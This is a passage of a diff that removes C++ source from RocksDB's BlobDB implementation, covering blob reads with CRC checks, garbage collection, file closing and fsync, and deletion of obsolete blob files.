-    return Status::NotFound("Blob Not Found as couldnt retrieve Blob");
-  }
-
-  // TODO(yiwu): Add an option to skip crc checking.
-  Slice crc_slice;
-  uint32_t crc_exp;
-  std::string crc_str;
-  crc_str.resize(sizeof(uint32_t));
-  char* crc_buffer = &(crc_str[0]);
-  s = reader->Read(blob_index.offset() - (key.size() + sizeof(uint32_t)),
-                   sizeof(uint32_t), &crc_slice, crc_buffer);
-  if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failed to fetch blob crc file: %s blob_offset: %" PRIu64
-                      " blob_size: %" PRIu64 " key: %s status: '%s'",
-                      bfile->PathName().c_str(), blob_index.offset(),
-                      blob_index.size(), key.data(), s.ToString().c_str());
-    }
-    return Status::NotFound("Blob Not Found as couldnt retrieve CRC");
-  }
-
-  uint32_t crc = crc32c::Value(key.data(), key.size());
-  crc = crc32c::Extend(crc, blob_value.data(), blob_value.size());
-  crc = crc32c::Mask(crc);  // Adjust for storage
-  if (crc != crc_exp) {
-    if (debug_level_ >= 2) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Blob crc mismatch file: %s blob_offset: %" PRIu64
-                      " blob_size: %" PRIu64 " key: %s status: '%s'",
-                      bfile->PathName().c_str(), blob_index.offset(),
-                      blob_index.size(), key.data(), s.ToString().c_str());
-    }
-    return Status::Corruption("Corruption. Blob CRC mismatch");
-  }
-
-  if (bfile->compression() != kNoCompression) {
-    BlockContents contents;
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily());
-    s = UncompressBlockContentsForCompressionType(
-        blob_value.data(), blob_value.size(), &contents,
-        kBlockBasedTableVersionFormat, Slice(), bfile->compression(),
-        *(cfh->cfd()->ioptions()));
-    *(value->GetSelf()) = contents.data.ToString();
-  }
-
-  value->PinSelf();
-
-  return s;
-}
-
-Status BlobDBImpl::Get(const ReadOptions& read_options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       PinnableSlice* value) {
-  if (column_family != DefaultColumnFamily()) {
-    return Status::NotSupported(
-        "Blob DB doesn't support non-default column family.");
-  }
-  // Get a snapshot to avoid blob file get deleted between we
-  // fetch and index entry and reading from the file.
-  // TODO(yiwu): For Get() retry if file not found would be a simpler strategy.
-  ReadOptions ro(read_options);
-  bool snapshot_created = SetSnapshotIfNeeded(&ro);
-
-  Status s;
-  bool is_blob_index = false;
-  s = db_impl_->GetImpl(ro, column_family, key, value,
-                        nullptr /*value_found*/, &is_blob_index);
-  TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1");
-  TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2");
-  if (s.ok() && is_blob_index) {
-    std::string index_entry = value->ToString();
-    value->Reset();
-    s = GetBlobValue(key, index_entry, value);
-  }
-  if (snapshot_created) {
-    db_->ReleaseSnapshot(ro.snapshot);
-  }
-  return s;
-}
-
-std::pair<bool, int64_t> BlobDBImpl::SanityCheck(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  ROCKS_LOG_INFO(db_options_.info_log, "Starting Sanity Check");
-
-  ROCKS_LOG_INFO(db_options_.info_log, "Number of files %" PRIu64,
-                 blob_files_.size());
-
-  ROCKS_LOG_INFO(db_options_.info_log, "Number of open files %" PRIu64,
-                 open_ttl_files_.size());
-
-  for (auto bfile : open_ttl_files_) {
-    assert(!bfile->Immutable());
-  }
-
-  uint64_t epoch_now = EpochNow();
-
-  for (auto bfile_pair : blob_files_) {
-    auto bfile = bfile_pair.second;
-    ROCKS_LOG_INFO(
-        db_options_.info_log,
-        "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64,
-        bfile->PathName().c_str(), bfile->GetFileSize(), bfile->BlobCount(),
-        bfile->deleted_count_, bfile->deleted_size_,
-        (bfile->expiration_range_.second - epoch_now));
-  }
-
-  // reschedule
-  return std::make_pair(true, -1);
-}
-
-Status BlobDBImpl::CloseBlobFile(std::shared_ptr<BlobFile> bfile) {
-  assert(bfile != nullptr);
-  Status s;
-  ROCKS_LOG_INFO(db_options_.info_log, "Close blob file %" PRIu64,
-                 bfile->BlobFileNumber());
-  {
-    WriteLock wl(&mutex_);
-
-    if (bfile->HasTTL()) {
-      size_t erased __attribute__((__unused__));
-      erased = open_ttl_files_.erase(bfile);
-      assert(erased == 1);
-    } else {
-      assert(bfile == open_non_ttl_file_);
-      open_non_ttl_file_ = nullptr;
-    }
-  }
-
-  if (!bfile->closed_.load()) {
-    WriteLock lockbfile_w(&bfile->mutex_);
-    s = bfile->WriteFooterAndCloseLocked();
-  }
-
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to close blob file %" PRIu64 "with error: %s",
-                    bfile->BlobFileNumber(), s.ToString().c_str());
-  }
-
-  return s;
-}
-
-Status BlobDBImpl::CloseBlobFileIfNeeded(std::shared_ptr<BlobFile>& bfile) {
-  // atomic read
-  if (bfile->GetFileSize() < bdb_options_.blob_file_size) {
-    return Status::OK();
-  }
-  return CloseBlobFile(bfile);
-}
-
-bool BlobDBImpl::VisibleToActiveSnapshot(
-    const std::shared_ptr<BlobFile>& bfile) {
-  assert(bfile->Obsolete());
-  SequenceNumber first_sequence = bfile->GetSequenceRange().first;
-  SequenceNumber obsolete_sequence = bfile->GetObsoleteSequence();
-  return db_impl_->HasActiveSnapshotInRange(first_sequence, obsolete_sequence);
-}
-
-bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size,
-                                       uint64_t blob_offset,
-                                       uint64_t blob_size) {
-  assert(bdb_options_.enable_garbage_collection);
-  (void)blob_offset;
-  std::shared_ptr<BlobFile> bfile;
-  {
-    ReadLock rl(&mutex_);
-    auto hitr = blob_files_.find(file_number);
-
-    // file was deleted
-    if (hitr == blob_files_.end()) {
-      return false;
-    }
-
-    bfile = hitr->second;
-  }
-
-  WriteLock lockbfile_w(&bfile->mutex_);
-
-  bfile->deleted_count_++;
-  bfile->deleted_size_ += key_size + blob_size + BlobLogRecord::kHeaderSize;
-  return true;
-}
-
-bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) {
-  assert(bdb_options_.enable_garbage_collection);
-  BlobIndex blob_index;
-  Status s = blob_index.DecodeFrom(index_entry);
-  if (!s.ok()) {
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Could not parse lsm val in MarkBlobDeleted %s",
-                   index_entry.ToString().c_str());
-    return false;
-  }
-  bool succ = FindFileAndEvictABlob(blob_index.file_number(), key.size(),
-                                    blob_index.offset(), blob_index.size());
-  return succ;
-}
-
-std::pair<bool, int64_t> BlobDBImpl::EvictCompacted(bool aborted) {
-  assert(bdb_options_.enable_garbage_collection);
-  if (aborted) return std::make_pair(false, -1);
-
-  override_packet_t packet;
-  size_t total_vals = 0;
-  size_t mark_evicted = 0;
-  while (override_vals_q_.dequeue(&packet)) {
-    bool succeeded =
-        FindFileAndEvictABlob(packet.file_number_, packet.key_size_,
-                              packet.blob_offset_, packet.blob_size_);
-    total_vals++;
-    if (succeeded) {
-      mark_evicted++;
-    }
-  }
-  ROCKS_LOG_INFO(db_options_.info_log,
-                 "Mark %" ROCKSDB_PRIszt
-                 " values to evict, out of %" ROCKSDB_PRIszt
-                 " compacted values.",
-                 mark_evicted, total_vals);
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::EvictDeletions(bool aborted) {
-  assert(bdb_options_.enable_garbage_collection);
-  if (aborted) return std::make_pair(false, -1);
-
-  ColumnFamilyHandle* last_cfh = nullptr;
-  Options last_op;
-
-  Arena arena;
-  ScopedArenaIterator iter;
-
-  // we will use same RangeDelAggregator for all cf's.
-  // essentially we do not support Range Deletes now
-  std::unique_ptr<RangeDelAggregator> range_del_agg;
-  delete_packet_t dpacket;
-  while (delete_keys_q_.dequeue(&dpacket)) {
-    if (last_cfh != dpacket.cfh_) {
-      if (!range_del_agg) {
-        auto cfhi = reinterpret_cast<ColumnFamilyHandleImpl*>(dpacket.cfh_);
-        auto cfd = cfhi->cfd();
-        range_del_agg.reset(new RangeDelAggregator(cfd->internal_comparator(),
-                                                   kMaxSequenceNumber));
-      }
-
-      // this can be expensive
-      last_cfh = dpacket.cfh_;
-      last_op = db_impl_->GetOptions(last_cfh);
-      iter.set(db_impl_->NewInternalIterator(&arena, range_del_agg.get(),
-                                             dpacket.cfh_));
-      // this will not work for multiple CF's.
-    }
-
-    Slice user_key(dpacket.key_);
-    InternalKey target(user_key, dpacket.dsn_, kTypeValue);
-
-    Slice eslice = target.Encode();
-    iter->Seek(eslice);
-
-    if (!iter->status().ok()) {
-      ROCKS_LOG_INFO(db_options_.info_log, "Invalid iterator seek %s",
-                     dpacket.key_.c_str());
-      continue;
-    }
-
-    const Comparator* bwc = BytewiseComparator();
-    while (iter->Valid()) {
-      if (!bwc->Equal(ExtractUserKey(iter->key()), ExtractUserKey(eslice)))
-        break;
-
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      if (!ParseInternalKey(iter->key(), &ikey)) {
-        continue;
-      }
-
-      // once you hit a DELETE, assume the keys below have been
-      // processed previously
-      if (ikey.type == kTypeDeletion || ikey.type == kTypeSingleDeletion) break;
-
-      Slice val = iter->value();
-      MarkBlobDeleted(ikey.user_key, val);
-
-      iter->Next();
-    }
-  }
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::CheckSeqFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  std::vector<std::shared_ptr<BlobFile>> process_files;
-  {
-    uint64_t epoch_now = EpochNow();
-
-    ReadLock rl(&mutex_);
-    for (auto bfile : open_ttl_files_) {
-      {
-        ReadLock lockbfile_r(&bfile->mutex_);
-
-        if (bfile->expiration_range_.second > epoch_now) continue;
-        process_files.push_back(bfile);
-      }
-    }
-  }
-
-  for (auto bfile : process_files) {
-    CloseBlobFile(bfile);
-  }
-
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::FsyncFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  MutexLock l(&write_mutex_);
-
-  std::vector<std::shared_ptr<BlobFile>> process_files;
-  {
-    ReadLock rl(&mutex_);
-    for (auto fitr : open_ttl_files_) {
-      if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync))
-        process_files.push_back(fitr);
-    }
-
-    if (open_non_ttl_file_ != nullptr &&
-        open_non_ttl_file_->NeedsFsync(true, bdb_options_.bytes_per_sync)) {
-      process_files.push_back(open_non_ttl_file_);
-    }
-  }
-
-  for (auto fitr : process_files) {
-    if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync)) fitr->Fsync();
-  }
-
-  bool expected = true;
-  if (dir_change_.compare_exchange_weak(expected, false)) dir_ent_->Fsync();
-
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::ReclaimOpenFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  if (open_file_count_.load() < kOpenFilesTrigger) {
-    return std::make_pair(true, -1);
-  }
-
-  // in the future, we should sort by last_access_
-  // instead of closing every file
-  ReadLock rl(&mutex_);
-  for (auto const& ent : blob_files_) {
-    auto bfile = ent.second;
-    if (bfile->last_access_.load() == -1) continue;
-
-    WriteLock lockbfile_w(&bfile->mutex_);
-    CloseRandomAccessLocked(bfile);
-  }
-
-  return std::make_pair(true, -1);
-}
-
-// TODO(yiwu): correct the stats and expose it.
-std::pair<bool, int64_t> BlobDBImpl::WaStats(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  WriteLock wl(&mutex_);
-
-  if (all_periods_write_.size() >= kWriteAmplificationStatsPeriods) {
-    total_periods_write_ -= (*all_periods_write_.begin());
-    total_periods_ampl_ = (*all_periods_ampl_.begin());
-
-    all_periods_write_.pop_front();
-    all_periods_ampl_.pop_front();
-  }
-
-  uint64_t val1 = last_period_write_.load();
-  uint64_t val2 = last_period_ampl_.load();
-
-  all_periods_write_.push_back(val1);
-  all_periods_ampl_.push_back(val2);
-
-  last_period_write_ = 0;
-  last_period_ampl_ = 0;
-
-  total_periods_write_ += val1;
-  total_periods_ampl_ += val2;
-
-  return std::make_pair(true, -1);
-}
-
-// Write callback for garbage collection to check if key has been updated
-// since last read. Similar to how OptimisticTransaction works. See inline
-// comment in GCFileAndUpdateLSM().
-class BlobDBImpl::GarbageCollectionWriteCallback : public WriteCallback {
- public:
-  GarbageCollectionWriteCallback(ColumnFamilyData* cfd, const Slice& key,
-                                 SequenceNumber upper_bound)
-      : cfd_(cfd), key_(key), upper_bound_(upper_bound) {}
-
-  virtual Status Callback(DB* db) override {
-    auto* db_impl = reinterpret_cast<DBImpl*>(db);
-    auto* sv = db_impl->GetAndRefSuperVersion(cfd_);
-    SequenceNumber latest_seq = 0;
-    bool found_record_for_key = false;
-    bool is_blob_index = false;
-    Status s = db_impl->GetLatestSequenceForKey(
-        sv, key_, false /*cache_only*/, &latest_seq, &found_record_for_key,
-        &is_blob_index);
-    db_impl->ReturnAndCleanupSuperVersion(cfd_, sv);
-    if (!s.ok() && !s.IsNotFound()) {
-      // Error.
-      assert(!s.IsBusy());
-      return s;
-    }
-    if (s.IsNotFound()) {
-      assert(!found_record_for_key);
-      return Status::Busy("Key deleted");
-    }
-    assert(found_record_for_key);
-    assert(is_blob_index);
-    if (latest_seq > upper_bound_) {
-      return Status::Busy("Key overwritten");
-    }
-    return s;
-  }
-
-  virtual bool AllowWriteBatching() override { return false; }
-
- private:
-  ColumnFamilyData* cfd_;
-  // Key to check
-  Slice key_;
-  // Upper bound of sequence number to proceed.
-  SequenceNumber upper_bound_;
-};
-
-// iterate over the blobs sequentially and check if the blob sequence number
-// is the latest. If it is the latest, preserve it, otherwise delete it
-// if it is TTL based, and the TTL has expired, then
-// we can blow the entity if the key is still the latest or the Key is not
-// found
-// WHAT HAPPENS IF THE KEY HAS BEEN OVERRIDEN. Then we can drop the blob
-// without doing anything if the earliest snapshot is not
-// referring to that sequence number, i.e. it is later than the sequence number
-// of the new key
-//
-// if it is not TTL based, then we can blow the key if the key has been
-// DELETED in the LSM
-Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr,
-                                      GCStats* gc_stats) {
-  uint64_t now = EpochNow();
-
-  std::shared_ptr<Reader> reader =
-      bfptr->OpenSequentialReader(env_, db_options_, env_options_);
-  if (!reader) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "File sequential reader could not be opened",
-                    bfptr->PathName().c_str());
-    return Status::IOError("failed to create sequential reader");
-  }
-
-  BlobLogHeader header;
-  Status s = reader->ReadHeader(&header);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failure to read header for blob-file %s",
-                    bfptr->PathName().c_str());
-    return s;
-  }
-
-  bool first_gc = bfptr->gc_once_after_open_;
-
-  auto* cfh =
-      db_impl_->GetColumnFamilyHandleUnlocked(bfptr->column_family_id());
-  auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-  auto column_family_id = cfd->GetID();
-  bool has_ttl = header.has_ttl;
-
-  // this reads the key but skips the blob
-  Reader::ReadLevel shallow = Reader::kReadHeaderKey;
-
-  bool no_relocation_ttl =
-      (has_ttl && now >= bfptr->GetExpirationRange().second);
-
-  bool no_relocation_lsmdel = false;
-  {
-    ReadLock lockbfile_r(&bfptr->mutex_);
-    no_relocation_lsmdel =
-        (bfptr->GetFileSize() ==
-         (BlobLogHeader::kSize + bfptr->deleted_size_ + BlobLogFooter::kSize));
-  }
-
-  bool no_relocation = no_relocation_ttl || no_relocation_lsmdel;
-  if (!no_relocation) {
-    // read the blob because you have to write it back to new file
-    shallow = Reader::kReadHeaderKeyBlob;
-  }
-
-  BlobLogRecord record;
-  std::shared_ptr<BlobFile> newfile;
-  std::shared_ptr<Writer> new_writer;
-  uint64_t blob_offset = 0;
-
-  while (true) {
-    assert(s.ok());
-
-    // Read the next blob record.
-    Status read_record_status =
-        reader->ReadRecord(&record, shallow, &blob_offset);
-    // Exit if we reach the end of blob file.
-    // TODO(yiwu): properly handle ReadRecord error.
-    if (!read_record_status.ok()) {
-      break;
-    }
-    gc_stats->blob_count++;
-
-    // Similar to OptimisticTransaction, we obtain latest_seq from
-    // base DB, which is guaranteed to be no smaller than the sequence of
-    // current key. We use a WriteCallback on write to check the key sequence
-    // on write. If the key sequence is larger than latest_seq, we know
-    // a new versions is inserted and the old blob can be disgard.
-    //
-    // We cannot use OptimisticTransaction because we need to pass
-    // is_blob_index flag to GetImpl.
-    SequenceNumber latest_seq = GetLatestSequenceNumber();
-    bool is_blob_index = false;
-    PinnableSlice index_entry;
-    Status get_status = db_impl_->GetImpl(
-        ReadOptions(), cfh, record.key, &index_entry, nullptr /*value_found*/,
-        &is_blob_index);
-    TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB");
-    if (!get_status.ok() && !get_status.IsNotFound()) {
-      // error
-      s = get_status;
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Error while getting index entry: %s",
-                      s.ToString().c_str());
-      break;
-    }
-    if (get_status.IsNotFound() || !is_blob_index) {
-      // Either the key is deleted or updated with a newer version whish is
-      // inlined in LSM.
-      continue;
-    }
-
-    BlobIndex blob_index;
-    s = blob_index.DecodeFrom(index_entry);
-    if (!s.ok()) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Error while decoding index entry: %s",
-                      s.ToString().c_str());
-      break;
-    }
-    if (blob_index.file_number() != bfptr->BlobFileNumber() ||
-        blob_index.offset() != blob_offset) {
-      // Key has been overwritten. Drop the blob record.
-      continue;
-    }
-
-    GarbageCollectionWriteCallback callback(cfd, record.key, latest_seq);
-
-    // If key has expired, remove it from base DB.
-    // TODO(yiwu): Blob indexes will be remove by BlobIndexCompactionFilter.
-    // We can just drop the blob record.
-    if (no_relocation_ttl || (has_ttl && now >= record.expiration)) {
-      gc_stats->num_deletes++;
-      gc_stats->deleted_size += record.value_size;
-      TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete");
-      WriteBatch delete_batch;
-      Status delete_status = delete_batch.Delete(record.key);
-      if (delete_status.ok()) {
-        delete_status = db_impl_->WriteWithCallback(WriteOptions(),
-                                                    &delete_batch, &callback);
-      }
-      if (delete_status.ok()) {
-        gc_stats->delete_succeeded++;
-      } else if (delete_status.IsBusy()) {
-        // The key is overwritten in the meanwhile. Drop the blob record.
-        gc_stats->overwritten_while_delete++;
-      } else {
-        // We hit an error.
-        s = delete_status;
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "Error while deleting expired key: %s",
-                        s.ToString().c_str());
-        break;
-      }
-      // Continue to next blob record or retry.
-      continue;
-    }
-
-    if (first_gc) {
-      // Do not relocate blob record for initial GC.
-      continue;
-    }
-
-    // Relocate the blob record to new file.
-    if (!newfile) {
-      // new file
-      std::string reason("GC of ");
-      reason += bfptr->PathName();
-      newfile = NewBlobFile(reason);
-      gc_stats->newfile = newfile;
-
-      new_writer = CheckOrCreateWriterLocked(newfile);
-      newfile->header_ = std::move(header);
-      // Can't use header beyond this point
-      newfile->header_valid_ = true;
-      newfile->file_size_ = BlobLogHeader::kSize;
-      s = new_writer->WriteHeader(newfile->header_);
-
-      if (!s.ok()) {
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "File: %s - header writing failed",
-                        newfile->PathName().c_str());
-        break;
-      }
-
-      WriteLock wl(&mutex_);
-
-      dir_change_.store(true);
-      blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile));
-    }
-
-    gc_stats->num_relocate++;
-    std::string new_index_entry;
-
-    uint64_t new_blob_offset = 0;
-    uint64_t new_key_offset = 0;
-    // write the blob to the blob log.
-    s = new_writer->AddRecord(record.key, record.value, record.expiration,
-                              &new_key_offset, &new_blob_offset);
-
-    BlobIndex::EncodeBlob(&new_index_entry, newfile->BlobFileNumber(),
-                          new_blob_offset, record.value.size(),
-                          bdb_options_.compression);
-
-    newfile->blob_count_++;
-    newfile->file_size_ +=
-        BlobLogRecord::kHeaderSize + record.key.size() + record.value.size();
-
-    TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate");
-    WriteBatch rewrite_batch;
-    Status rewrite_status = WriteBatchInternal::PutBlobIndex(
-        &rewrite_batch, column_family_id, record.key, new_index_entry);
-    if (rewrite_status.ok()) {
-      rewrite_status = db_impl_->WriteWithCallback(WriteOptions(),
-                                                   &rewrite_batch, &callback);
-    }
-    if (rewrite_status.ok()) {
-      newfile->ExtendSequenceRange(
-          WriteBatchInternal::Sequence(&rewrite_batch));
-      gc_stats->relocate_succeeded++;
-    } else if (rewrite_status.IsBusy()) {
-      // The key is overwritten in the meanwhile. Drop the blob record.
-      gc_stats->overwritten_while_relocate++;
-    } else {
-      // We hit an error.
-      s = rewrite_status;
-      ROCKS_LOG_ERROR(db_options_.info_log, "Error while relocating key: %s",
-                      s.ToString().c_str());
-      break;
-    }
-  }  // end of ReadRecord loop
-
-  if (s.ok()) {
-    SequenceNumber obsolete_sequence =
-        newfile == nullptr ? bfptr->GetSequenceRange().second + 1
-                           : newfile->GetSequenceRange().second;
-    bfptr->MarkObsolete(obsolete_sequence);
-    if (!first_gc) {
-      WriteLock wl(&mutex_);
-      obsolete_files_.push_back(bfptr);
-    }
-  }
-
-  ROCKS_LOG_INFO(
-      db_options_.info_log,
-      "%s blob file %" PRIu64
-      ". Total blob records: %" PRIu64 ", Deletes: %" PRIu64 "/%" PRIu64
-      " succeeded, Relocates: %" PRIu64 "/%" PRIu64 " succeeded.",
-      s.ok() ? "Successfully garbage collected" : "Failed to garbage collect",
-      bfptr->BlobFileNumber(), gc_stats->blob_count, gc_stats->delete_succeeded,
-      gc_stats->num_deletes, gc_stats->relocate_succeeded,
-      gc_stats->num_relocate);
-  if (newfile != nullptr) {
-    total_blob_space_ += newfile->file_size_;
-    ROCKS_LOG_INFO(db_options_.info_log, "New blob file %" PRIu64 ".",
-                   newfile->BlobFileNumber());
-  }
-  return s;
-}
-
-// Ideally we should hold the lock during the entire function,
-// but under the asusmption that this is only called when a
-// file is Immutable, we can reduce the critical section
-bool BlobDBImpl::ShouldGCFile(std::shared_ptr<BlobFile> bfile, uint64_t now,
-                              bool is_oldest_non_ttl_file,
-                              std::string* reason) {
-  if (bfile->HasTTL()) {
-    ExpirationRange expiration_range = bfile->GetExpirationRange();
-    if (now > expiration_range.second) {
-      *reason = "entire file ttl expired";
-      return true;
-    }
-
-    if (!bfile->file_size_.load()) {
-      ROCKS_LOG_ERROR(db_options_.info_log, "Invalid file size = 0 %s",
-                      bfile->PathName().c_str());
-      *reason = "file is empty";
-      return false;
-    }
-
-    if (bfile->gc_once_after_open_.load()) {
-      return true;
-    }
-
-    if (bdb_options_.ttl_range_secs < kPartialExpirationGCRangeSecs) {
-      *reason = "has ttl but partial expiration not turned on";
-      return false;
-    }
-
-    ReadLock lockbfile_r(&bfile->mutex_);
-    bool ret = ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) >
-                kPartialExpirationPercentage);
-    if (ret) {
-      *reason = "deleted blobs beyond threshold";
-    } else {
-      *reason = "deleted blobs below threshold";
-    }
-    return ret;
-  }
-
-  // when crash happens, we lose the in-memory account of deleted blobs.
-  // we are therefore forced to do one GC to make sure delete accounting
-  // is OK
-  if (bfile->gc_once_after_open_.load()) {
-    return true;
-  }
-
-  ReadLock lockbfile_r(&bfile->mutex_);
-
-  if (bdb_options_.enable_garbage_collection) {
-    if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) >
-        kPartialExpirationPercentage) {
-      *reason = "deleted simple blobs beyond threshold";
-      return true;
-    }
-  }
-
-  // if we haven't reached limits of disk space, don't DELETE
-  if (bdb_options_.blob_dir_size == 0 ||
-      total_blob_space_.load() < bdb_options_.blob_dir_size) {
-    *reason = "disk space not exceeded";
-    return false;
-  }
-
-  if (is_oldest_non_ttl_file) {
-    *reason = "out of space and is the oldest simple blob file";
-    return true;
-  }
-  *reason = "out of space but is not the oldest simple blob file";
-  return false;
-}
-
-std::pair<bool, int64_t> BlobDBImpl::DeleteObsoleteFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  {
-    ReadLock rl(&mutex_);
-    if (obsolete_files_.empty()) return std::make_pair(true, -1);
-  }
-
-  std::list<std::shared_ptr<BlobFile>> tobsolete;
-  {
-    WriteLock wl(&mutex_);
-    tobsolete.swap(obsolete_files_);
-  }
-
-  bool file_deleted = false;
-  for (auto iter = tobsolete.begin(); iter != tobsolete.end();) {
-    auto bfile = *iter;
-    {
-      ReadLock lockbfile_r(&bfile->mutex_);
-      if (VisibleToActiveSnapshot(bfile)) {
-        ROCKS_LOG_INFO(db_options_.info_log,
-                       "Could not delete file due to snapshot failure %s",
-                       bfile->PathName().c_str());
-        ++iter;
-        continue;
-      }
-    }
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Will delete file due to snapshot success %s",
-                   bfile->PathName().c_str());
-
-    blob_files_.erase(bfile->BlobFileNumber());
-    Status s = env_->DeleteFile(bfile->PathName());
-    if (!s.ok()) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "File failed to be deleted as obsolete %s",
-                      bfile->PathName().c_str());
-      ++iter;
-      continue;
-    }
-
-    file_deleted = true;
-    total_blob_space_ -= bfile->file_size_;
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "File deleted as obsolete from blob dir %s",
-                   bfile->PathName().c_str());
-
-    iter = tobsolete.erase(iter);
-  }
-
-  // directory change. Fsync
-  if (file_deleted) {
-    dir_ent_->Fsync();
-
-    // reset oldest_file_evicted flag
-    oldest_file_evicted_.store(false);
-  }
-
-  // put files back into obsolete if for some reason, delete failed
-  if (!tobsolete.empty()) {
-    WriteLock wl(&mutex_);
-    for (auto bfile : tobsolete) {
-      obsolete_files_.push_front(bfile);
-    }
-  }
-
-  return std::make_pair(!aborted, -1);
-}
-
-void BlobDBImpl::CopyBlobFiles(
-    std::vector<std::shared_ptr<BlobFile>>* bfiles_copy,
-    std::function<bool(const std::shared_ptr<BlobFile>&)> predicate) {
-  ReadLock rl(&mutex_);
-
-  for (auto const& p : blob_files_) {
-    bool pred_value = true;
-    if (predicate) {
-      pred_value = predicate(p.second);
-    }
-    if (pred_value) {
-      bfiles_copy->push_back(p.second);
-    }
-  }
-}
-
-void BlobDBImpl::FilterSubsetOfFiles(
-    const std::vector<std::shared_ptr<BlobFile>>& blob_files,
-    std::vector<std::shared_ptr<BlobFile>>* to_process, uint64_t epoch,
-    size_t files_to_collect) {
-  // 100.0 / 15.0 = 7
-  uint64_t next_epoch_increment = static_cast<uint64_t>(
-      std::ceil(100 / static_cast<double>(kGCFilePercentage)));
-  uint64_t now = EpochNow();
-
-  size_t files_processed = 0;
-  bool non_ttl_file_found = false;
-  for (auto bfile : blob_files) {
-    if (files_processed >= files_to_collect) break;
-    // if this is the first time processing the file
-    // i.e. gc_epoch == -1, process it.
-    // else process the file if its processing epoch matches
-    // the current epoch. Typically the #of epochs should be
-    // around 5-10
-    if (bfile->gc_epoch_ != -1 && (uint64_t)bfile->gc_epoch_ != epoch) {
-      continue;
-    }
-
-    files_processed++;
-    // reset the epoch
-    bfile->gc_epoch_ = epoch + next_epoch_increment;
-
-    // file has already been GC'd or is still open for append,
-    // then it should not be GC'd
-    if (bfile->Obsolete() || !bfile->Immutable()) continue;
-
-    bool is_oldest_non_ttl_file = false;
-    if (!non_ttl_file_found && !bfile->HasTTL()) {
-      is_oldest_non_ttl_file = true;
-      non_ttl_file_found = true;
-    }
-
-    std::string reason;
-    bool shouldgc = ShouldGCFile(bfile, now, is_oldest_non_ttl_file, &reason);
-    if (!shouldgc) {
-      ROCKS_LOG_DEBUG(db_options_.info_log,
-                      "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64
-                      " reason='%s'",
-                      bfile->PathName().c_str(), now,
-                      bfile->GetExpirationRange().second, reason.c_str());
-      continue;
-    }
-
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "File has been chosen for GC ttl %s %" PRIu64 " %" PRIu64
-                   " reason='%s'",
-                   bfile->PathName().c_str(), now,
-                   bfile->GetExpirationRange().second, reason.c_str());
-    to_process->push_back(bfile);
-  }
-}
-
-std::pair<bool, int64_t> BlobDBImpl::RunGC(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  current_epoch_++;
-
-  std::vector<std::shared_ptr<BlobFile>> blob_files;
-  CopyBlobFiles(&blob_files);
-
-  if (!blob_files.size()) return std::make_pair(true, -1);
-
-  // 15% of files are collected each call to space out the IO and CPU
-  // consumption.
-  size_t files_to_collect = (kGCFilePercentage * blob_files.size()) / 100;
-
-  std::vector<std::shared_ptr<BlobFile>> to_process;
-  FilterSubsetOfFiles(blob_files, &to_process, current_epoch_,
-                      files_to_collect);
-
-  for (auto bfile : to_process) {
-    GCStats gc_stats;
-    Status s = GCFileAndUpdateLSM(bfile, &gc_stats);
-    if (!s.ok()) {
-      continue;
-    }
-
-    if (bfile->gc_once_after_open_.load()) {
-      WriteLock lockbfile_w(&bfile->mutex_);
-
-      bfile->deleted_size_ = gc_stats.deleted_size;
-      bfile->deleted_count_ = gc_stats.num_deletes;
-      bfile->gc_once_after_open_ = false;
-    }
-  }
-
-  // reschedule
-  return std::make_pair(true, -1);
-}
-
-Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options) {
-  auto* cfd =
